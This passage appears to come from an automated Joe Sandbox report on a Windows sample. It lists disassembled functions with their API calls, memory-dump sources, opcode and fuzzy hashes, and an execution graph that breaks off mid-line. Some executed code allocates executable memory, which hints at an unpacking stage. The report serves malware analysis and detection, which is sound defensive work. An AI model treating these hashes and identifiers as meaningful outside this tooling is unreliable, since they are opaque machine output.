                                                Function 00007FFDAC08ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDAC08ED07), ref: 00007FFDAC08EE38
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDAC08ED07), ref: 00007FFDAC08EEC3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode
                                                • String ID:
                                                • API String ID: 953036326-0
                                                • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                • Instruction ID: f5a841966cede3ab7143a6a6749f2183fc8730fd293be8935db19f8c6b958536
                                                • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                • Instruction Fuzzy Hash: 3E91F536B1A65189F7708F3594602BC3BA0AB44BE8F148179DE2E53786CF38D465E71C
                                                Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalEventSection$EnterLeaveReset
                                                • String ID:
                                                • API String ID: 3553466030-0
                                                • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalEventSection$EnterLeaveReset
                                                • String ID:
                                                • API String ID: 3553466030-0
                                                • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                Function 00007FFDAC082218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                • String ID:
                                                • API String ID: 2933794660-0
                                                • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                • Instruction ID: 84b922cebee6e031bc73f859978ab8f1da5c54095d0e61aa5d6617facfc5e7ff
                                                • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                • Instruction Fuzzy Hash: 80111C22B16B018AEB00CB60E8653B833A4F7597A8F440A31DA6D467A5DF78D165C348
                                                Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CreateEvent$CriticalInitializeSection
                                                • String ID:
                                                • API String ID: 926662266-0
                                                • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                Function 00007FFDAC085C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: __except_validate_context_record
                                                • String ID: csm$csm
                                                • API String ID: 1467352782-3733052814
                                                • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                • Instruction ID: a9033f95390414428df578d1457c71d03723fac88dcb4f0de87b98eada1370c1
                                                • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                • Instruction Fuzzy Hash: 4C71823260A6818AEB748F15946477D7BA0FB54BE4F14C135DE4C87B8ACB2CD461D74C
                                                Function 00007FFDAC086298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CreateFrameInfo__except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 2558813199-1018135373
                                                • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                • Instruction ID: 898aa93b742497ef252fb90a2958d3989fba25a01843d796979c27e0c8e33343
                                                • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                • Instruction Fuzzy Hash: 4F515E3671AB4196D630AF15E45026E7BA4FB89BE0F109538EB8D07B56CF38E461DB08
                                                Function 00007FFDAC08EA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                • Instruction ID: 1dd35de063abafbc7595bacd8de6eabc5a0ddab057c08abba736012461d27d19
                                                • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                • Instruction Fuzzy Hash: 4041D532B1AA4182DB20CF65E4543AA77A0FB98BE4F408031EE9E87795DF3CD451DB48
                                                Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID: csm
                                                • API String ID: 3997070919-1018135373
                                                • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                Function 00007FFDAC090910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00007FFDAC083A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFDAC083A63
                                                • __GSHandlerCheckCommon.LIBCMT ref: 00007FFDAC090993
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CheckCommonHandler__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 1543384424-629598281
                                                • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                • Instruction ID: 67ead92ac9278876deac68a229261b445595ed150de132fe90fe9e2591e1b38b
                                                • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                • Instruction Fuzzy Hash: D311B132B1979585EB209F66E4512A97764EB89FE4F08C035EE8807B57CF38D861D708
                                                Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: TimerWaitable
                                                • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                • API String ID: 1823812067-484248852
                                                • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                Function 00007FFDAC083990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDAC08112F), ref: 00007FFDAC0839E0
                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDAC08112F), ref: 00007FFDAC083A21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                • Instruction ID: d21e5c7074c93faf3fa6cde89af3367c60497d3d31b1b95ad229fde64870252d
                                                • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                • Instruction Fuzzy Hash: 8E112B32619B8182EB218B19E45026977E5FB88BA4F588230DFCD47B59DF3CD562DB08
                                                Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: TimerWaitable
                                                • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                • API String ID: 1823812067-3336177065
                                                • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                                Executed Functions

                                                Function 04DE017F Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04DE01DF
                                                Memory Dump Source
                                                • Source File: 00000028.00000003.3469066038.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_40_3_4de0000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                • Instruction ID: 2daf944824bbb8cc6c2a535a587c465a65460416b3ee7f6bcc81d72ec857f7e8
                                                • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                • Instruction Fuzzy Hash: 73A13A70A00626EFDB16DFAAC980ABEB7F5FF48304B148169E415DB251D7B0EA51CB90
                                                Function 04DE044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04DE048B
                                                • VirtualFree.KERNELBASE(?,?,00004000), ref: 04DE04F1
                                                Memory Dump Source
                                                • Source File: 00000028.00000003.3469066038.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_40_3_4de0000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                • Instruction ID: 31122c45f8b458042b7c588183f1f20478b02b77af4eb29194c5cbeedb3de88b
                                                • Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                • Instruction Fuzzy Hash: 7521C975A00215ABD721AEA58D84FBFB7F9EF04214F104468EA5AA2282D6B1B900D660

                                                Non-executed Functions

                                                Function 04DE00CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000028.00000003.3469066038.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_40_3_4de0000_G5CQjd.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: l$ntdl
                                                • API String ID: 0-924918826
                                                • Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                • Instruction ID: ef9004203ace7abaf4a0e0abcb55fae33cadfc542da46b03c1fcbdcb1ea3afff
                                                • Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                • Instruction Fuzzy Hash: 0011BFB5700A11AFDB16EF19C408A1EBBF6FF88714B218559E009D7710EB74EA21CBE5
                                                Function 04DE0643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000028.00000003.3469066038.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_40_3_4de0000_G5CQjd.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: l$ntdl
                                                • API String ID: 0-924918826
                                                • Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                • Instruction ID: 1f897dac02f39eeea880021134faaf512c35ebf9ba47f65fea618204ab493af2
                                                • Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                • Instruction Fuzzy Hash: 95018871700114AFDB15EF99C845EAEFBB9EF85654F044069F904A7350DA70EE00CBA1

                                                Execution Graph

                                                Execution Coverage:6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.3%
                                                Total number of Nodes:1047
                                                Total number of Limit Nodes:29
                                                execution_graph 4410 711391 4411 7113cd 4410->4411 4413 7113a3 4410->4413 4413->4411 4414 7128da 4413->4414 4415 7128e6 __msize 4414->4415 4416 712345 __getptd 66 API calls 4415->4416 4417 7128eb 4416->4417 4418 7151fb _abort 68 API calls 4417->4418 4419 71290d __msize 4418->4419 4419->4411 4372 7126b0 4373 7126e9 4372->4373 4374 7126dc 4372->4374 4376 7110cc __crtGetStringTypeA_stat 5 API calls 4373->4376 4375 7110cc __crtGetStringTypeA_stat 5 API calls 4374->4375 4375->4373 4383 7126f9 __except_handler4 __IsNonwritableInCurrentImage 4376->4383 4377 71277c 4378 712752 __except_handler4 4378->4377 4379 71276c 4378->4379 4380 7110cc __crtGetStringTypeA_stat 5 API calls 4378->4380 4381 7110cc __crtGetStringTypeA_stat 5 API calls 4379->4381 4380->4379 4381->4377 4383->4377 4383->4378 4388 7151ca RtlUnwind 4383->4388 4384 7127cb __except_handler4 4385 7127ff 4384->4385 4387 7110cc __crtGetStringTypeA_stat 5 API calls 4384->4387 4386 7110cc __crtGetStringTypeA_stat 5 API calls 4385->4386 4386->4378 4387->4385 4388->4384 4389 7131b4 4390 7131c0 SetLastError 4389->4390 4391 7131c8 __msize 4389->4391 4390->4391 4392 715138 4393 71514a 4392->4393 4395 715158 @_EH4_CallFilterFunc@8 4392->4395 4394 7110cc __crtGetStringTypeA_stat 5 API calls 4393->4394 4394->4395 4396 71543d 4397 711411 __amsg_exit 66 API calls 4396->4397 4398 715444 4397->4398 3930 71235f 3932 71236b __msize 3930->3932 3931 712383 3935 712391 3931->3935 3936 7135ee __crtGetStringTypeA_stat 66 API calls 3931->3936 3932->3931 3933 71246d __msize 3932->3933 3934 7135ee __crtGetStringTypeA_stat 66 API calls 3932->3934 3934->3931 3937 71239f 3935->3937 3938 7135ee __crtGetStringTypeA_stat 66 API calls 3935->3938 3936->3935 3939 7135ee __crtGetStringTypeA_stat 66 API calls 3937->3939 3940 7123ad 3937->3940 3938->3937 3939->3940 3941 7123bb 3940->3941 3942 7135ee __crtGetStringTypeA_stat 66 API calls 3940->3942 3943 7123c9 3941->3943 3944 7135ee __crtGetStringTypeA_stat 66 API calls 3941->3944 3942->3941 3945 7123d7 3943->3945 3947 7135ee __crtGetStringTypeA_stat 66 API calls 3943->3947 3944->3943 3946 7123e8 3945->3946 3948 7135ee __crtGetStringTypeA_stat 66 API calls 3945->3948 3949 712aa0 __lock 66 API calls 3946->3949 3947->3945 3948->3946 3950 7123f0 3949->3950 3951 712415 3950->3951 3952 7123fc InterlockedDecrement 3950->3952 3966 712479 3951->3966 3952->3951 3953 712407 3952->3953 3953->3951 3957 7135ee __crtGetStringTypeA_stat 66 API calls 3953->3957 3956 712aa0 __lock 66 API calls 3958 712429 3956->3958 3957->3951 3959 71245a 3958->3959 3969 713d2d 3958->3969 4013 712485 3959->4013 3963 7135ee __crtGetStringTypeA_stat 66 API calls 3963->3933 4016 7129c6 LeaveCriticalSection 3966->4016 3968 712422 3968->3956 3970 71243e 3969->3970 3971 713d3e InterlockedDecrement 3969->3971 3970->3959 3983 713b55 3970->3983 3972 713d53 InterlockedDecrement 3971->3972 3973 713d56 3971->3973 3972->3973 3974 713d60 InterlockedDecrement 3973->3974 3975 713d63 3973->3975 3974->3975 3976 713d70 3975->3976 3977 713d6d InterlockedDecrement 3975->3977 3978 713d7a InterlockedDecrement 3976->3978 3980 713d7d 3976->3980 3977->3976 3978->3980 3979 713d96 InterlockedDecrement 3979->3980 3980->3979 3981 713da6 InterlockedDecrement 3980->3981 3982 713db1 InterlockedDecrement 3980->3982 3981->3980 3982->3970 3984 713bd9 3983->3984 3985 713b6c 3983->3985 3986 713c26 3984->3986 3987 7135ee 